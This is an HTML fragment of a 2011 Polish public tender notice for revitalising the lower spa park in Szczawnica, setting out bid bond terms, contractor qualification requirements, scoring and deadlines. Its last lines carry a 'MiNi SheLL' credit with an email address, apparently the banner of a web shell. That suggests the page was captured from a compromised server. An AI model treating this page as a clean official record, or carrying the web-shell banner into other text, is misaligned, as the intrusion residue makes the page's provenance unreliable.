<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 37.50.00.00-3, 45.11.27.11-2, 77.31.30.00-7, 45.23.32.00-1, 43.32.50.00-7, 45.31.61.00-6, 45.31.61.10-9, 33.14.17.50-2, 37.53.52.00-9, 77.30.00.00-3, 45.22.00.00-5, 45.23.31.61-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości: 
100 000 PLN

2. Forma wadium:
1) Wadium może być wniesione w następujących formach: 
a) pieniądzu; 
b) poręczeniach bankowych; 
c) gwarancjach bankowych; 
d) gwarancjach ubezpieczeniowych; 
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.). 
2) W przypadku składania przez Wykonawcę wadium w formie gwarancji/poręczenia, gwarancja poręczenie powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy: 
a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji poręczenia (Zamawiającego), gwaranta poręczyciela (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib, 
b) określenie wierzytelności, która ma być zabezpieczona gwarancją poręczeniem, 
c) kwotę gwarancji poręczenia, 
d) termin ważności gwarancji poręczenia 
e) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji poręczenia na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
 odmówił podpisania umowy na warunkach określonych w ofercie, lub 
 nie wniósł zabezpieczenia należytego wykonania umowy, lub 
 zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
 nie złożył dokumentów lub oświadczeń na wezwanie zamawiającego, zgodnie z art. 46 ust. 4a Pzp
f) Gwarancja poręczenia ma być nieodwołalne, bezwarunkowe, płatne na pisemne żądanie Zamawiającego i nieprzenośne na osoby trzecie. 

Miejsce i sposób wniesienia wadium:
1) Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek Zamawiającego: 22 8817 0000 2001 0000 0589 0106 z dopiskiem: wadium dla przetargu: REWITALIZACJA UZDROWISKOWEGO PARKU DOLNEGO W SZCZAWNICY WRAZ Z ELEMENTAMI MAŁEJ ARCHITEKTURY UZDROWISKOWEJ 
2) Wadium wnoszone w innych dopuszczonych przez Zamawiającego formach należy dołączyć w oryginale do oferty. 
3)Wykonawca zostanie wykluczony z niniejszego postępowania, jeżeli jego oferta przed upływem terminu składania ofert nie zostanie zabezpieczona akceptowaną przez Zamawiającego formą wadium w wymaganej wysokości. 
4) Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie do złożenia lub uzupełnienia oświadczeń, dokumentów lub pełnomocnictw nie złoży dokumentów lub oświadczeń potwierdzających spełnianie warunków udziału w postępowaniu lub pełnomocnictw chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie wykonał roboty budowlane:
5 odpowiadających specyfiką przedmiotowi zamówienia w tym: 
1 inwestycja związana z budową lub przebudową placów, chodników, ścieżek w różnych nawierzchniach o łącznej powierzchni min. 3000 m2 (w czym nawierzchnie z kostki betonowej, granitowej lub innej dekoracyjnej min. 1000 m2), o wartości tych robót minimum 700 000,00 złotych netto.
1 inwestycja związana z budową lub przebudową budynków o kubaturze powyżej 500 m3, o wartości tych robót minimum 1 000 000,00 złotych netto. 
1 inwestycja wykonana w ramach robót branży wodnej lub melioracyjnej lub hydrotechnicznej, o wartości tych robót minimum 200 000,00 złotych netto. 
1 inwestycja polegająca na wykonaniu sieci oświetlenia ulicznego, parkowego lub innego dekoracyjnego architektonicznego zewnętrznego o wartości tych robót minimum 200 000,00 złotych netto. 
1 robota budowlana  z zakresu budowy lub przebudowy ogrodu botanicznego lub robót budowlanych, które obejmowały w swoim zakresie nasadzenia bylin, krzewów, trawników o powierzchni minimum 5000 m2, o wartości tych robót minimum 200.000,00 netto.
 
Wykonawca winien wykazać, ze wszystkie w/w roboty zostały wykonane zgodnie 
z zasadami sztuki budowlanej i prawidłowo ukończone. Wykonawca może polegać na wiedzy 
i doświadczeniu innych podmiotów. W takim przypadku Wykonawca winien udowodnić Zamawiającemu, że będzie dysponował tymi zasobami tj. przedstawi pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Sprawdzenie w/w warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawców dokumentów i oświadczeń wg zasady spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia, posiadającymi kwalifikacje niezbędne do wykonania zamówienia, tj.: 
Kierownika/ów Budowy, posiadających wykształcenie techniczne i uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń, które pozwalają na kierowanie robotami budowlanymi w specjalności architektonicznej, konstrukcyjno budowlanej, drogowej, instalacyjnej w zakresie sieci, wodociągowej i kanalizacyjnej, instalacji i urządzeń elektrycznych (art. 14 ust. 1 ustawy z dnia 07 lipca 1994 r. Prawo budowlane Dz. U. z 2006 r. Nr 156, poz. 1118 z późn. zm.), lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów.
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów. 
W takim przypadku Wykonawca winien udowodnić Zamawiającemu, że będzie dysponował tymi zasobami tj. przedstawi pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Sprawdzenie w/w warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawców dokumentów i oświadczeń wg zasady spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać wysokość posiadanych środków finansowych lub zdolność kredytową do wysokości wyższej lub równej 5 mln złotych. Sprawdzenie w/w warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawców dokumentów wg zasady spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>11)	Oświadczenie złożone na podstawie art. 44 Ustawy, że Wykonawca spełnia warunki określone w art. 22 ust. 1 Ustawy na druku wg załącznika nr 2 pkt 1,
12)	Wniosek o dopuszczenie do udziału w przetargu ograniczonym  druk wg załącznika nr 1,
13)	Zgodnie z art. 23 ust. 1 Ustawy Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza) musi być dołączone do wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia. Wykonawcy występujący wspólnie mogą złożyć tylko jedną ofertę. Dokumenty wymienione w ust. 2  winien dołączyć każdy podmiot występujący wspólnie. Oświadczenie wymienione w pkt 12) w zakresie spełnianych przez Wykonawców warunków określonych w art. 22 ust. 1 Ustawy, Wykonawcy mogą złożyć wspólnie na jednym dokumencie lub każdy z nich złoży takie oświadczenie na odrębnym dokumencie.
14)	Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w rozdz. VI , polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w rozdz. VII ust 2. 
15)	Jeżeli Wykonawca wykazując spełnianie warunku, o którym mowa w rozdz. VI pkt 1.3. , polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, Zamawiający wymaga przedłożenia informacji, o której mowa w rozdz. VII pkt 1 4) , dotyczącej tych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Za wykazanie minimalnego zakresu robót budowlanych:
5 odpowiadających specyfiką przedmiotowi zamówienia w tym: 
1 inwestycja związana z budową lub przebudową placów, chodników, ścieżek w różnych nawierzchniach o łącznej powierzchni min. 3000 m2 (w czym nawierzchnie z kostki betonowej, granitowej lub innej dekoracyjnej min. 1000 m2), o wartości tych robót minimum 700 000,00 złotych netto.
1 inwestycja związana z budową lub przebudową budynków o kubaturze powyżej 500 m3, o wartości tych robót minimum 1 000 000,00 złotych netto. 
1 inwestycja wykonana w ramach robót branży wodnej lub melioracyjnej lub hydrotechnicznej, o wartości tych robót minimum 200 000,00 złotych netto. 
1 inwestycja polegająca na wykonaniu sieci oświetlenia ulicznego, parkowego lub innego dekoracyjnego architektonicznego zewnętrznego o wartości tych robót minimum 200 000,00 złotych netto. 
1 robota budowlana  z zakresu budowy lub przebudowy ogrodu botanicznego lub robót budowlanych, które obejmowały w swoim zakresie nasadzenia bylin, krzewów, trawników o powierzchni minimum 5000 m2, o wartości tych robót minimum 200.000,00 netto. Zamawiający przyzna 40 pkt.
Za  robotę, ponad minimalny zakres, związaną z budową, przebudową, rozbudową, remontem obiektu kubaturowego (nie więcej niż 1 robota) lecz wykonaną na terenach strefy ochrony zabytków, z obiektami zabytkowymi, lub na obszarze chronionego krajobrazu (np. Park Krajobrazowy, rezerwat przyrody, Park Narodowy), lub na terenach obszarów górniczych (z zasobami wód mineralnych) - 20 pkt.
Za każdą robotę, ponad minimalny zakres, związaną z budową, przebudową, rozbudową ciągów komunikacyjnych na terenie parków miejskich, lub ogrodów botanicznych ( nie więcej niż 2 roboty) lub wykonanym na terenach strefy ochrony zabytków, z obiektami zabytkowymi, lub na obszarze chronionego krajobrazu (np. Park Krajobrazowy, rezerwat przyrody, Park Narodowy), lub na terenach obszarów górniczych (z zasobami wód mineralnych) - 20 pkt.za każdą wykazaną robotę (maksymalna liczba punktów - 40) - W wykazie należy wskazać, która inwestycja zrealizowana była na terenach strefy ochrony  zabytków, z obiektami zabytkowymi, lub na obszarze chronionego krajobrazu (np. Park Krajobrazowy, rezerwat przyrody, Park Narodowy), lub na terenach obszarów górniczych (z zasobami wód mineralnych).

W sumie, maksymalnie uzyskać można 100 pkt. 

Ocena stopnia spełniania warunków polegać będzie na określeniu łącznej ilości punktów (zawierającej się w przedziale 40 - 100 pkt) uzyskanych za ww. roboty i będzie równa sumie łącznej ilości punktów za powyższe. Najwyższą ocenę otrzyma wniosek z maksymalną ilością punktów, kolejne wnioski otrzymają oceny równe ilości uzyskanych punktów.

Do udziału w postępowaniu zostaną zaproszeni Wykonawcy, którzy otrzymali najwyższą liczbę punktów, obliczoną zgodnie z powyższym.
W przypadku, gdyby ilość wniosków z tą samą maksymalną punktacją była większa niż 5, wszyscy wykonawcy, którzy złożyli w/w wnioski zostaną zaproszeni do udziału w postępowaniu. 
W przypadku gdyby wnioski znajdujące się na liście rankingowej utworzonej malejąco na podstawie otrzymanych punktów, miały tą samą ilość punktów, miejsca na liście określone będą dla w/w wniosków alfabetycznie. 
Do udziału w postępowaniu (do złożenia ofert) zaproszeni zostaną również Ci wykonawcy, których wnioski otrzymały taką samą liczbę punktów, jak wniosek będący na miejscu 1-5 na liście rankingowej, a którzy ze względu na kolejność alfabetyczną zajęli miejsca 6 i niższe.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy w następujących sytuacjach:
a) zmiany osób wyznaczonych do realizacji zadania, a wyszczególnionych w umowie, takich jak osoby reprezentujące Wykonawcę, Zamawiającego, kierownika budowy robót, jak też powołania nowych, w następujących przypadkach:
śmierci, choroby lub innych zdarzeń losowych;
1.	       jeżeli zmiana osoby wykonującej niniejsze zamówienie stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacji, itp.).
b)	w przypadku niezawinionego przez Wykonawcę przesunięcia (wydłużenia) terminów wynikających z harmonogramu czasowego i ostatecznego zakończenia robót objętych robotami, wydłużeniu ulec może termin realizacji umowy.
Przez niezawinione przez Wykonawcę wydłużenie terminu wynikające z harmonogramu czasowego rozumie się wydłużenie terminu spowodowane siłą wyższą, a zatem przez wszelkie zdarzenia o charakterze nadzwyczajnym występujące po zawarciu umowy, a których strony nie były w stanie przewidzieć w momencie jej zawierania i których zaistnienie i skutki uniemożliwiają wykonanie umowy zgodnie z jej postanowieniami. Do działań siły wyższej zalicza się w szczególności: wojnę, działania wojenne, powódź, pożar, który nie powstał z winy Wykonawcy lub Zamawiającego, akt administracji państwowej. Za wypadek wywołany siłą wyższą będzie uznane tylko takie wydarzenie, na którego powstanie i przebieg strona nie miała i nie mogła mieć wpływu, któremu nie mogła się przeciwstawić i które czyni niemożliwym wywiązanie się na czas z zobowiązań umownych.
Powyższe ewentualne zmiany dokonane zostaną w formie aneksów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia zostanie przekazana wykonawcom zaproszonym do dalszego udziału w postępowaniu..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2011 godzina 11:00, miejsce: Urząd Miasta i Gminy Szczawnica
ul. Szalaya 103
34-460 Szczawnica
sekretariat pok. nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie finansowane z następujących źródeł: 
- współfinansowane przez Unię Europejską w ramach Małopolskiego Regionalnego Programu Operacyjnego na  lata 2007 - 2013, Oś Priorytetowa 3 Turystyka i przemysł kulturowy, Działanie 3.1 Rozwój infrastruktury turystycznej Schemat B- Inwestycje w obiekty i infrastrukturę uzdrowiskową Małopolskiego Regionalnego Programu Operacyjnego. 
- Dofinansowanie - 50 %
- Wkład własny beneficjenta - 50 %.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com